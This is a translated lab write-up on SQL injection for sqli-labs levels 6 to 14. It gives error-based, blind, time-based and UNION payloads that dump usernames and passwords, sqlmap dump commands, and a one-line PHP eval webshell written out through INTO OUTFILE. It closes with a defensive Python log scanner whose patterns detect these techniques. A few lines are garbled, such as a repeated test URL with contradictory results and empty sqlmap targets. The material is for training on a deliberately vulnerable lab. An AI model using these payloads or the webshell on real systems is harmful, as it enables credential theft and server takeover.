Sqli-labs customs clearance (less6-less14)
2022-07-02 06:54:00 【Xu Jirong】
Test the closure step by step:
localhost/sqli/Less-6/?id=1"        // error, and the error message exposes the second half of the query statement
localhost/sqli/Less-6/?id=1"        // returns the correct page
                                    // empty page
The closure is therefore " (double quotes): an error-based GET injection.
As in the fifth level, we print the result directly through the error message:
localhost/sqli/Less-6/?id=1" and updatexml(1,concat(0x7e,(select CONCAT_WS(0x7e,username,password)from users limit 0,1)),0)-- -
SELECT * FROM users WHERE id="1" and updatexml(1,concat(0x7e,(select CONCAT_WS(0x7e,username,password)from users limit 0,1)),0)-- -" LIMIT 0,1
localhost/sqli/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select CONCAT_WS(0x7e,username,password)from users limit 0,1)))-- -
SELECT * FROM users WHERE id="1" and extractvalue(1,concat(0x7e,(select CONCAT_WS(0x7e,username,password)from users limit 0,1)))-- -" LIMIT 0,1
http://localhost/sqli/Less-6/?id=1" and (select 1 from (select count(*) ,concat((select CONCAT_WS(0x7e,username,password) from users limit 0,1),floor(rand(0)*2))x from users group by x)a) -- -
SELECT * FROM users WHERE id="1" and (select 1 from (select count(*) ,concat((select CONCAT_WS(0x7e,username,password) from users limit 0,1),floor(rand(0)*2))x from users group by x)a) -- -" LIMIT 0,1
Looking at the PHP source code:
$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
Less-7: a GET error-based injection closed with '))
Just like the previous two levels, so only the updatexml() version is shown:
http://localhost/sqli/Less-7/?id=1')) and updatexml(1,concat(0x7e,(select concat_ws(0x7e,username,password)from users limit 0,1)),0)-- -
SELECT * FROM users WHERE id=(('1')) and updatexml(1,concat(0x7e,(select concat_ws(0x7e,username,password)from users limit 0,1)),0)-- -')) LIMIT 0,1
But the title of this level is GET - Dump into outfile - String.
This is the SQL file-export issue. It relies on a MySQL feature, the INTO OUTFILE clause of a SELECT statement, which simply writes the query result to a text file.
That file is written on the database server's filesystem.
But when you try to export the file, the server reports an error:
You have an error in your SQL syntax
The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
This error occurs because the database has no write-out path configured for the file, or there is a problem with the path.
You can use
show variables like '%secure%';
to view the configured storage path. If secure_file_priv is NULL, no write path has been configured in the my.ini file (NULL disables file export entirely). To enable it you would have to add secure_file_priv=D:/OUTFILE under [mysqld] in my.ini, i.e. explicitly give the server a directory it may export files to, so this technique is hard to use in practice.
If the path is usable, a one-line PHP webshell could be written out like this:
')) union select "<?php @eval($_POST['sql']);?>" into outfile ' route '
I won't write it here, I don't want to.
http://localhost/sqli/Less-8/?id=1'                 // empty page
http://localhost/sqli/Less-8/?id=1 and 1=1          // returns data
http://localhost/sqli/Less-8/?id=1 and 1=2          // returns data
http://localhost/sqli/Less-8/?id=1' and '1'='1      // returns data
http://localhost/sqli/Less-8/?id=1' and '1'='2      // empty page
http://localhost/sqli/Less-8/?id=1' order by 3 -- - // returns data
So this should be a Boolean blind injection closed with ' (single quote).
We can guess the string character by character, as follows:
localhost/sqli/Less-8/?id=1' and ascii(substr(database(),1,1))>115 -- -
SELECT * FROM users WHERE id='1' and ascii(substr(database(),1,1))>115 -- -' LIMIT 0,1
localhost/sqli/Less-8/?id=1' and ascii(substr(database(),1,1))=115 -- -
SELECT * FROM users WHERE id='1' and ascii(substr(database(),1,1))=115 -- -' LIMIT 0,1
substr() is a substring function: substr(database(),1,1) takes one character of the database name, starting at the first character. We already know the database is 'security', so the extracted character is 's'.
ascii() converts a character into its ASCII code; the ASCII code of 's' is 115.
So the two requests above guessed the character twice: the first asks whether the first character of the database name is >115, which it is not, so the page returns empty; the second finds it equal to 115, so we know the first character of the database name is 's'.
Of course this only works because we already know the answer. If you don't, you have to guess with a binary search, which is very slow, so this kind of injection is usually done with a tool.
sqlmap Guessing GET Request database
We use sqlmap to guess it. How to use sqlmap you can look up yourself; I can't introduce every option one by one, only the ones I need.
sqlmap -u "" --dbs
This directly exposes the databases.
sqlmap also lists the injection types found and the payloads it used.
//logging the connection parameters to a file for analysis.
The PHP source writes a log file, and our run alone put more than 100 KB into it, so using sqlmap makes it very easy to insert a lot of dirty data into someone's website database.
sqlmap -u "" -D security --tables
Lists all tables; -D specifies the database. Check the usage yourself, it's simple.
sqlmap -u "" -D security -T users --columns
Lists all columns; -T specifies the table.
sqlmap -u "" -D security -T users -C "username,password" --dump
Dumps all column values; -C specifies the columns.
After sqlmap ran these few commands, that much data had been inserted, so don't mess around with it.
Let's take a look at the source code
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
echo '<font size="5" color="#FFFF00">';
//echo 'You are in...........';
//echo "You have an error in your SQL syntax";
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';
In other words, the echo of the error message has been commented out, so errors are no longer shown.
Less-9: the title tells us it is time-based blind injection:
GET-Blind-Time based single Quotes
Let's take a look at the source code
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
//echo "You have an error in your SQL syntax";
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';
Whether the condition is right or wrong, the page shows "You are in ...", so we can't see anything on the surface. That does not mean the injected SQL is not executed. To check whether there is an injection, we can add a sleep() statement to the payload.
Syntax: sleep(N)
N is the value in seconds; with this added, the query statement waits N seconds before returning.
How long sleep() takes also depends on how many rows the query statement produces, because it is treated as a field
and is evaluated once for every row generated; that is why the request above took 3 seconds longer.
With two rows of data it would take 6 seconds longer. So when many payloads all give the same result, add a sleep() function and look at the page response time to infer whether there is time-based blind injection.
http://localhost/sqli/Less-9/?id=1' and sleep(3)-- -
SELECT * FROM users WHERE id='1' and sleep(3)-- -' LIMIT 0,1
A manual payload can be written like this:
1' and if((substr(database(),1,1))='s',sleep(5),null)
In the browser developer tools we can see the response time of the request, 4 seconds or more, which indicates there is indeed an injection point.
Without an error echo, blind injection by hand is not easy. The judgment method is the same as for Boolean blind injection, just based on timing instead, so let's run sqlmap directly to get the passwords.
sqlmap -u "" -D security -T users -C "username,password" --dump
Less-10: take a look at the title
GET - Blind-Time based - double quotes
Time-based blind injection closed with double quotes. We won't try it one by one; unlike the earlier echo test it has to be judged by timing, which is a bit time-consuming, so we just run sqlmap.
sqlmap says there is no injection point...
Less-11, title: POST - Error Based - Single quotes -String
A POST-type, single-quote closed character injection with echo; when we look at the page we can also see it is a POST form.
If we give it a single quote, it reports an error.
From the error we can guess the second half of the query statement: username='' and password='' LIMIT 0,1
At this point we can build an always-true query statement:
' or 1=1 -- -
Let's look at the source code
//including the Mysql connect parameters.
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
//logging the connection parameters to a file for analysis.
fwrite($fp,'User Name:'.$uname);
// connectivity
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysqli_query($con1, $sql);
$row = mysqli_fetch_array($result, MYSQLI_BOTH);
//echo '<font color= "#0000ff">';
echo "<br>";
echo '<font color= "#FFFF00" font size = 4>';
//echo " You Have successfully logged in\n\n " ;
echo '<font size="3" color="#0000ff">';
echo "<br>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "<br>";
echo "</font>";
echo "<br>";
echo "<br>";
echo '<img src="../images/flag.jpg" />';
echo "</font>";
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
echo "</br>";
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
payload:' union select group_concat(username),group_concat(password) from users-- -
SELECT username, password FROM users WHERE username='' union select group_concat(username),group_concat(password) from users-- -' and password='' LIMIT 0,1
Less-12, title: POST - Error Based - Double quotes - String - with twist
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
Looking at the source code, it is a POST-type character injection with echo closed with "). The principle is the same as Less-11, so we take the passwords directly.
payload:") union select group_concat(username),group_concat(password) from users -- -
SELECT username, password FROM users WHERE username=("") union select group_concat(username),group_concat(password) from users -- -") and password=("") LIMIT 0,1
Less-13, title: POST - Double injection - Single quotes - String - with twist
payload:'            // reports an error, so the closure is ')
payload:') or 1=1 -- -
// Known to be an error-based injection: it does not echo values directly
Still updatexml(), extractvalue() and floor():
payload:') and updatexml(1,concat(0x7e,(select concat_ws(0x7e,username,password) from users limit 0,1)),0) -- -
SELECT username, password FROM users WHERE username=('') and updatexml(1,concat(0x7e,(select concat_ws(0x7e,username,password) from users limit 0,1)),0) -- -') and password=('') LIMIT 0,1
Less-14, title: POST - Double injection - Single quotes - String - with twist
// No echo
It should be noted that in
SELECT username, password FROM users WHERE username="'" and password="" LIMIT 0,1
with a "" (double quote) or ("") (double quotes plus parentheses) closure, a ' (single quote) inside is simply executed as part of the string. So just supplying a double quote is basically enough to determine whether the closure is double quotes, and whether mysqli_error($con) is used.
payload:"            // reports an error, and the error exposes the second half of the query statement: """ and password="" LIMIT 0,1
So it is an error-based POST-type character injection closed with double quotes.
It is the same as the earlier ones, so let's give it a payload:
admin" and (select 1 from (select count(*) ,concat((select concat_ws(0x7e,username,password) from users limit 0,1),floor(rand(0)*2))x from users group by x)a) -- -
SELECT username, password FROM users WHERE username="admin" and (select 1 from (select count(*) ,concat((select concat_ws(0x7e,username,password) from users limit 0,1),floor(rand(0)*2))x from users group by x)a) -- -" and password="" LIMIT 0,1
This floor() error-based method needs a valid value in front of the and; if the value is invalid the page shows empty. So the method requires us to already know one piece of information, which makes it awkward to use.
If you don't know the account name is 'admin', there is no way to trigger the error.
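From the defender's side, all of the primitives used across Less-6 to Less-14 (updatexml/extractvalue/floor error reporting, ascii(substr()) Boolean probes, sleep() timing probes, INTO OUTFILE) leave recognisable traces in web-server logs. The following Python scanner is an added example, not code from the original post or from sqli-labs; it assumes a constructed log layout of "METHOD path status duration_ms" and uses the recorded response time to corroborate the sleep() probes from Less-9 and Less-10.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines (assumed layout: METHOD path status duration_ms).
SAMPLE_LOG = """\
GET /sqli/Less-6/?id=1%22%20and%20updatexml(1,concat(0x7e,(select%20CONCAT_WS(0x7e,username,password)from%20users%20limit%200,1)),0)--%20- 200 12
GET /sqli/Less-8/?id=1%27%20and%20ascii(substr(database(),1,1))%3E115%20--%20- 200 9
GET /sqli/Less-9/?id=1%27%20and%20sleep(3)--%20- 200 3012
GET /sqli/Less-7/?id=1%27))%20union%20select%20%22x%22%20into%20outfile%20%27/tmp/a%27--%20- 200 10
GET /sqli/Less-6/?id=1 200 8
POST /sqli/Less-11/ 200 11
"""

# Signatures for the techniques discussed on this page, matched on the decoded query.
PATTERNS = {
    "error_based": re.compile(
        r"\b(updatexml|extractvalue)\s*\(|floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "boolean_blind": re.compile(r"\bascii\s*\(\s*substr\s*\(", re.I),
    "time_based": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "file_write": re.compile(r"\binto\s+(out|dump)file\b", re.I),
}
SLOW_MS = 2000  # a sleep(3) probe on a one-row query should exceed this


def classify(line):
    """Return the list of technique labels that match one log line."""
    method, path, status, duration_ms = line.split()
    # Decode twice: sqlmap and browsers frequently double-encode characters.
    decoded = unquote_plus(unquote_plus(path))
    # Inline comments (/**/) are a common whitespace substitute; normalise them away.
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)
    hits = [name for name, rx in PATTERNS.items() if rx.search(decoded)]
    # A sleep() probe whose response really was slow is strong evidence it executed.
    if "time_based" in hits and int(duration_ms) >= SLOW_MS:
        hits.append("slow_response_confirms_sleep")
    return hits


def scan(log_text):
    """Return (path_without_query, labels) for every suspicious line."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        hits = classify(line)
        if hits:
            findings.append((line.split()[1].split("?")[0], hits))
    return findings


if __name__ == "__main__":
    for path, labels in scan(SAMPLE_LOG):
        print(path, labels)
```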